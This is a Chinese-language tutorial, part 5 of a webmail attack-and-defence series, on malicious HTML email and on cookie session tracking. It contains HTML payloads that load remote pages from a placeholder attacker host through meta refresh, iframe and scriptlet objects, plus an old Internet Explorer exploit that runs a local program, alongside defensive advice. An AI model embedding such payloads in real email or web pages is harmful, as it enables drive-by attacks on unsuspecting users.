Webmail攻防实战(5)

2008-02-23 06:16:54来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

除了能够在html邮件中直接嵌入脚本程式外,攻击者还能够设计一些html代码,在用户打开html邮件时,不知不觉引入另一个html文档,而此文档中正含有恶性代码,这样不但能直接绕过WebMail系统对脚本程式的过滤,而且还能有效避开提供了防毒服务的邮件系统对恶性代码的查杀。下面是几个调用html文档的例子:

(1)Refresh到另一个页面:
  


  <body>
  <metahttp-equiv="refresh"content="1;URL=http://www.attacker.com/another.htm">
  </body>

  
(2)Iframe引入另一个页面:
  

  <body>
  <iframesrc="http://www.attacker.com/import.htm"frameborder="0"></iframe>
  </body>

  
(3)scriptlet引入另一个页面:
  

  <body>
  <objecttype="text/x-scriptlet"data="http://www.attacker.com/import.htm"></object>
  </body>

  
攻击者还能够采取如下方法,使带有恶性代码的html邮件具备更大的隐蔽性:

(1)配合邮件欺骗技术,使用户不会怀疑收到的邮件,并且攻击者也能隐藏自己的行踪。

(2)把html邮件设计成看起来像txt邮件

(3)有时能够把html邮件中的恶性代码放在一个隐藏的层里面,表面上看不出任何变化。

针对恶性脚本程式的影响,对用户常见的建议办法是提高浏览器的安全级别,如禁用ActiveX、禁用脚本等,但这并不是个很好的办法,因为这样会影响到用户对其他正常html页面的浏览。即使浏览器达到了最高级别,依然对某些恶性代码无济于事,下面是位以色列安全专家发现的漏洞,能让Windows系统自动执行任何本地程式,即使InternetExplorer已禁止了ActiveX和脚本程式:
  


  <spandatasrc="#oExec"datafld="exploit"dataformatas="html"></span>
  
  <xmlid="oExec">
  <security>
  <exploit>
  <![CDATA[
  <objectid="oFile"classid="clsid:11111111-1111-1111-1111-
  111111111111"codebase="c:/winnt/system32/calc.exe"></object>
  ]]>
  </exploit>
  </security>
  </xml>

  
面对恶性html邮件,WebMail系统和用户似乎都没有很好的解决办法,虽然许多WebMail系统已能够过滤掉html邮件中的很多恶性代码,但是令人遗憾的是,要想完全过滤掉恶性代码并不是一件容易的事情,攻击者总能利用WebMail系统过滤机制和浏览器的漏洞找到办法绕过种种过滤,WebMail系统所能做的就是发现一个漏洞补一个漏洞。

为了减少乃至避免恶性html邮件的影响,在打开html邮件之前,WebMail系统有必要提醒用户这是个html邮件,假如能提供让用户以文本方式浏览html邮件的功能,则是最好但是。在打开不明邮件之前,用户更要小心谨慎,最好把html邮件“目标另存为”到本地硬盘上再打开来看,假如能先查看html邮件源代码,则是最好但是。

另外需要特别提醒用户注意的是,虽然一些电子邮件系统会在WebMail系统上对html邮件中的恶性代码进行过滤,但在pop3服务器上并不会进行过滤,所以,假如是通过邮件客户端收取邮件,仍然要谨防恶性html邮件的危害。

五、Cookie会话攻击

当用户以自已的邮箱帐户和密码登录进WebMail以后,假如再让用户对每一步操作都输入密码加以确认就会让人不甚其烦。所以WebMail系统有必要进行用户会话跟踪,WebMail系统用到的会话跟踪技术主要有两种:cookie会话跟踪和URL会话跟踪。

Cookie是web服务器保存在用户浏览器上的文本信息,能够包含用户名、特别ID、访问次数等任何信息,通常此信息用于标识访问同一web服务器上的不同用户,在浏览器每次访问同一web服务器时会发送过去,用于跟踪特定客户端或浏览器和web服务器进行交互的状态。

Cookie的类型有两种:持久型和临时型。持久型cookie以文本形式存储在硬盘上,由浏览器存取。使用了持久型cookie会话跟踪的WebMail系统有hotmail、yahoo电邮(可选)等。临时型cookie也称为会话cookie,存储在内存中,仅为当前浏览器的对话存储,关闭当前浏览器后会立即消失,ASP、PHP4等研发程式中用到的session对象就会产生临时型cookie。使用了临时型cookie会话跟踪的WebMail系统有FM365、亿邮等。

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇: Webmail攻防实战(4)

下一篇: Webmail攻防实战(6)